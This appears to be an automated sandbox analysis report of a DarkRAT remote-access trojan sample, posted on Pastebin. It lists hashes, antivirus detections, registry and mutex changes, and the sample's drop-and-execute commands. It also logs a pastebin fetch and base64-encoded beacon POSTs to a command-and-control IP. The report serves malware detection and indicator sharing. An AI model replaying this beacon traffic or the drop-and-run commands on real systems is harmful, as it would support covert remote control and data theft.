Advertisement
paladin316

Exes_e8e44a60d885a42f35fa9fcfdb861b1c_exe_2019-08-20_02_05.txt

Aug 20th, 2019
1,808
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.83 KB | None | 0 0
  1.  
  2. * MalFamily: "Darkrat"
  3.  
  4. * MalScore: 10.0
  5.  
  6. * File Name: "Exes_e8e44a60d885a42f35fa9fcfdb861b1c.exe"
  7. * File Size: 991232
  8. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. * SHA256: "07c41d2bdb251269b0883b0880068f1480443e4fbd0c9e6f4e5b1b5004148d1c"
  10. * MD5: "e8e44a60d885a42f35fa9fcfdb861b1c"
  11. * SHA1: "27751d098c4289645d93a46297ae302236e82989"
  12. * SHA512: "2377dd0c5b81cb57b8ee98a57fce137a15dc8166425f613934673ec6d119efd5b7bb0f433f68290094591769b4a24b6fc26ed73f70432dcbda664fe9c067b140"
  13. * CRC32: "64FBA69E"
  14. * SSDEEP: "24576:ovfF4K7D53n3Un3BnvHfjVZ0FIECXXEVFU:gP93sj7vBAS"
  15.  
  16. * Process Execution:
  17. "Exes_e8e44a60d885a42f35fa9fcfdb861b1c.exe",
  18. "cmd.exe",
  19. "VZXeFFOcuZ.exe"
  20.  
  21.  
  22. * Executed Commands:
  23. "\"C:\\Windows\\System32\\cmd.exe\" /C start C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\VZXeFFOcuZ.exe",
  24. "cmd /C start C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\VZXeFFOcuZ.exe",
  25. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\VZXeFFOcuZ.exe"
  26.  
  27.  
  28. * Signatures Detected:
  29.  
  30. "Description": "Creates RWX memory",
  31. "Details":
  32.  
  33.  
  34. "Description": "A process created a hidden window",
  35. "Details":
  36.  
  37. "Process": "Exes_e8e44a60d885a42f35fa9fcfdb861b1c.exe -> cmd"
  38.  
  39.  
  40.  
  41.  
  42. "Description": "Drops a binary and executes it",
  43. "Details":
  44.  
  45. "binary": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\VZXeFFOcuZ.exe"
  46.  
  47.  
  48.  
  49.  
  50. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  51. "Details":
  52.  
  53. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  54.  
  55.  
  56. "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
  57.  
  58.  
  59. "suspicious_request": "http://138.68.217.234/request"
  60.  
  61.  
  62.  
  63.  
  64. "Description": "Performs some HTTP requests",
  65. "Details":
  66.  
  67. "url": "http://pastebin.com/raw/JyTUuzPa"
  68.  
  69.  
  70. "url": "http://138.68.217.234/request"
  71.  
  72.  
  73.  
  74.  
  75. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  76. "Details":
  77.  
  78. "Spam": "VZXeFFOcuZ.exe (1456) called API NtQueryInformationFile 29112 times"
  79.  
  80.  
  81. "Spam": "Exes_e8e44a60d885a42f35fa9fcfdb861b1c.exe (572) called API NtQueryInformationFile 29112 times"
  82.  
  83.  
  84.  
  85.  
  86. "Description": "Network activity detected but not expressed in API logs",
  87. "Details":
  88.  
  89.  
  90. "Description": "File has been identified by 18 Antiviruses on VirusTotal as malicious",
  91. "Details":
  92.  
  93. "FireEye": "Generic.mg.e8e44a60d885a42f"
  94.  
  95.  
  96. "McAfee": "RDN/Generic.dx"
  97.  
  98.  
  99. "CrowdStrike": "win/malicious_confidence_70% (W)"
  100.  
  101.  
  102. "Invincea": "heuristic"
  103.  
  104.  
  105. "APEX": "Malicious"
  106.  
  107.  
  108. "Kaspersky": "UDS:DangerousObject.Multi.Generic"
  109.  
  110.  
  111. "AegisLab": "Trojan.Multi.Generic.4!c"
  112.  
  113.  
  114. "McAfee-GW-Edition": "BehavesLike.Win32.Dropper.dh"
  115.  
  116.  
  117. "Trapmine": "malicious.high.ml.score"
  118.  
  119.  
  120. "SentinelOne": "DFI - Suspicious PE"
  121.  
  122.  
  123. "Microsoft": "Trojan:Win32/Zpevdo.A"
  124.  
  125.  
  126. "Endgame": "malicious (high confidence)"
  127.  
  128.  
  129. "ZoneAlarm": "UDS:DangerousObject.Multi.Generic"
  130.  
  131.  
  132. "Acronis": "suspicious"
  133.  
  134.  
  135. "Cylance": "Unsafe"
  136.  
  137.  
  138. "ESET-NOD32": "a variant of Win32/GenKryptik.DQNV"
  139.  
  140.  
  141. "Rising": "Trojan.GenKryptik!8.AA55 (CLOUD)"
  142.  
  143.  
  144. "Fortinet": "W32/GenKryptik.DQNV!tr"
  145.  
  146.  
  147.  
  148.  
  149. "Description": "Creates a copy of itself",
  150. "Details":
  151.  
  152. "copy": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\VZXeFFOcuZ.exe"
  153.  
  154.  
  155.  
  156.  
  157. "Description": "Created network traffic indicative of malicious activity",
  158. "Details":
  159.  
  160. "signature": "ET TROJAN Win32/DarkRAT CnC Activity"
  161.  
  162.  
  163.  
  164.  
  165.  
  166. * Started Service:
  167.  
  168. * Mutexes:
  169. "Local\\kupaw",
  170. "Local\\ZoneAttributeCacheCounterMutex",
  171. "Local\\ZonesCacheCounterMutex",
  172. "Local\\ZonesLockedCacheCounterMutex"
  173.  
  174.  
  175. * Modified Files:
  176. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\VZXeFFOcuZ.exe"
  177.  
  178.  
  179. * Deleted Files:
  180.  
  181. * Modified Registry Keys:
  182. "HKEY_CURRENT_USER\\Software\\Local AppWizard-Generated Applications",
  183. "HKEY_CURRENT_USER\\Software\\Local AppWizard-Generated Applications\\HexEditor",
  184. "HKEY_CURRENT_USER\\Software\\Local AppWizard-Generated Applications\\HexEditor\\Recent File List",
  185. "HKEY_CURRENT_USER\\Software\\Local AppWizard-Generated Applications\\HexEditor\\Settings",
  186. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
  187. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect"
  188.  
  189.  
  190. * Deleted Registry Keys:
  191. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
  192. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
  193. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
  194. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName"
  195.  
  196.  
  197. * DNS Communications:
  198.  
  199. "type": "A",
  200. "request": "pastebin.com",
  201. "answers":
  202.  
  203. "data": "104.20.209.21",
  204. "type": "A"
  205.  
  206.  
  207. "data": "104.20.208.21",
  208. "type": "A"
  209.  
  210.  
  211.  
  212.  
  213.  
  214. * Domains:
  215.  
  216. "ip": "104.20.209.21",
  217. "domain": "pastebin.com"
  218.  
  219.  
  220.  
  221. * Network Communication - ICMP:
  222.  
  223. * Network Communication - HTTP:
  224.  
  225. "count": 1,
  226. "body": "",
  227. "uri": "http://pastebin.com/raw/JyTUuzPa",
  228. "user-agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3",
  229. "method": "GET",
  230. "host": "pastebin.com",
  231. "version": "1.1",
  232. "path": "/raw/JyTUuzPa",
  233. "data": "GET /raw/JyTUuzPa HTTP/1.1\r\nAccept: text/plain\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3\r\nHost: pastebin.com\r\n\r\n",
  234. "port": 80
  235.  
  236.  
  237. "count": 1,
  238. "body": "request=YUhkcFpEMWpNVFV4TldFeE1pMHhOelkwTFRRMk16SXRZV05sT1MxaE9XUm1aamt5TlRNeU1EQW1ZMjl0Y0hWMFpYSnVZVzFsUFZOQ1ZWYzNXRFkwSm1GdmNtNXZkRDEwY25WbEptbHVjM1JoYkd4bFpGSmhiVDB6TGprNU9UVTJOU1p1WlhSR2NtRnRaWGR2Y21zeVBYUnlkV1VtYm1WMFJuSmhiV1YzYjNKck16MTBjblZsSm01bGRFWnlZVzFsZDI5eWF6TTFQWFJ5ZFdVbWJtVjBSbkpoYldWM2IzSnJORDFtWVd4elpTWmhiblJwZG1seWRYTTlKbUp2ZEhabGNuTnBiMjQ5TWk0eExqTW1aM0IxVG1GdFpUMWtSemxyWW5jOVBTWmpjSFZPWVcxbFBVbERRV2RKUTBGblNVVnNkV1JIVm5OTFJrbHdTVVpvYkdJeU5HOVZhV3RuVVRGQ1ZrbEZWVEZNVkVreVRucEJaMDFEUWtGSlJFbDFUbXBDU0ZOSWJ6MG1ZWEpqYUQxbFJGa3dKbTl3WlhKcGJtZHplWE4wWlcwOVZqSnNkVnBIT1ROamVVRXpTVVpPYkdOdVduQlpNbFZuVlVkR2FtRjVRWGdtYzNCeVpXRmtkR0ZuUFhCaGJHbDM=",
  239. "uri": "http://138.68.217.234/request",
  240. "user-agent": "gate",
  241. "method": "POST",
  242. "host": "138.68.217.234",
  243. "version": "1.1",
  244. "path": "/request",
  245. "data": "POST /request HTTP/1.1\r\nAccept: text/plain\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: gate\r\nHost: 138.68.217.234\r\nContent-Length: 660\r\n\r\nrequest=YUhkcFpEMWpNVFV4TldFeE1pMHhOelkwTFRRMk16SXRZV05sT1MxaE9XUm1aamt5TlRNeU1EQW1ZMjl0Y0hWMFpYSnVZVzFsUFZOQ1ZWYzNXRFkwSm1GdmNtNXZkRDEwY25WbEptbHVjM1JoYkd4bFpGSmhiVDB6TGprNU9UVTJOU1p1WlhSR2NtRnRaWGR2Y21zeVBYUnlkV1VtYm1WMFJuSmhiV1YzYjNKck16MTBjblZsSm01bGRFWnlZVzFsZDI5eWF6TTFQWFJ5ZFdVbWJtVjBSbkpoYldWM2IzSnJORDFtWVd4elpTWmhiblJwZG1seWRYTTlKbUp2ZEhabGNuTnBiMjQ5TWk0eExqTW1aM0IxVG1GdFpUMWtSemxyWW5jOVBTWmpjSFZPWVcxbFBVbERRV2RKUTBGblNVVnNkV1JIVm5OTFJrbHdTVVpvYkdJeU5HOVZhV3RuVVRGQ1ZrbEZWVEZNVkVreVRucEJaMDFEUWtGSlJFbDFUbXBDU0ZOSWJ6MG1ZWEpqYUQxbFJGa3dKbTl3WlhKcGJtZHplWE4wWlcwOVZqSnNkVnBIT1ROamVVRXpTVVpPYkdOdVduQlpNbFZuVlVkR2FtRjVRWGdtYzNCeVpXRmtkR0ZuUFhCaGJHbDM=",
  246. "port": 80
  247.  
  248.  
  249. "count": 25,
  250. "body": "request=YUhkcFpEMWpNVFV4TldFeE1pMHhOelkwTFRRMk16SXRZV05sT1MxaE9XUm1aamt5TlRNeU1EQW1ZMjl0Y0hWMFpYSnVZVzFsUFZOQ1ZWYzNXRFkwSm1GdmNtNXZkRDEwY25WbEptbHVjM1JoYkd4bFpGSmhiVDB6TGprNU9UVTJOU1p1WlhSR2NtRnRaWGR2Y21zeVBYUnlkV1VtYm1WMFJuSmhiV1YzYjNKck16MTBjblZsSm01bGRFWnlZVzFsZDI5eWF6TTFQWFJ5ZFdVbWJtVjBSbkpoYldWM2IzSnJORDFtWVd4elpTWmhiblJwZG1seWRYTTlKbUp2ZEhabGNuTnBiMjQ5TWk0eExqTW1aM0IxVG1GdFpUMWtSemxyWW5jOVBTWmpjSFZPWVcxbFBVbERRV2RKUTBGblNVVnNkV1JIVm5OTFJrbHdTVVpvYkdJeU5HOVZhV3RuVVRGQ1ZrbEZWVEZNVkVreVRucEJaMDFEUWtGSlJFbDFUbXBDU0ZOSWJ6MG1ZWEpqYUQxbFJGa3dKbTl3WlhKcGJtZHplWE4wWlcwOVZqSnNkVnBIT1ROamVVRXpTVVpPYkdOdVduQlpNbFZuVlVkR2FtRjVRWGdtYzNCeVpXRmtkR0ZuUFhCaGJHbDM=",
  251. "uri": "http://138.68.217.234/request",
  252. "user-agent": "gate",
  253. "method": "POST",
  254. "host": "138.68.217.234",
  255. "version": "1.1",
  256. "path": "/request",
  257. "data": "POST /request HTTP/1.1\r\nAccept: text/plain\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: gate\r\nHost: 138.68.217.234\r\nContent-Length: 660\r\nCookie: PHPSESSID=fn93a21vhk143tblikrctn9of7\r\n\r\nrequest=YUhkcFpEMWpNVFV4TldFeE1pMHhOelkwTFRRMk16SXRZV05sT1MxaE9XUm1aamt5TlRNeU1EQW1ZMjl0Y0hWMFpYSnVZVzFsUFZOQ1ZWYzNXRFkwSm1GdmNtNXZkRDEwY25WbEptbHVjM1JoYkd4bFpGSmhiVDB6TGprNU9UVTJOU1p1WlhSR2NtRnRaWGR2Y21zeVBYUnlkV1VtYm1WMFJuSmhiV1YzYjNKck16MTBjblZsSm01bGRFWnlZVzFsZDI5eWF6TTFQWFJ5ZFdVbWJtVjBSbkpoYldWM2IzSnJORDFtWVd4elpTWmhiblJwZG1seWRYTTlKbUp2ZEhabGNuTnBiMjQ5TWk0eExqTW1aM0IxVG1GdFpUMWtSemxyWW5jOVBTWmpjSFZPWVcxbFBVbERRV2RKUTBGblNVVnNkV1JIVm5OTFJrbHdTVVpvYkdJeU5HOVZhV3RuVVRGQ1ZrbEZWVEZNVkVreVRucEJaMDFEUWtGSlJFbDFUbXBDU0ZOSWJ6MG1ZWEpqYUQxbFJGa3dKbTl3WlhKcGJtZHplWE4wWlcwOVZqSnNkVnBIT1ROamVVRXpTVVpPYkdOdVduQlpNbFZuVlVkR2FtRjVRWGdtYzNCeVpXRmtkR0ZuUFhCaGJHbDM=",
  258. "port": 80
  259.  
  260.  
  261.  
  262. * Network Communication - SMTP:
  263.  
  264. * Network Communication - Hosts:
  265.  
  266. * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement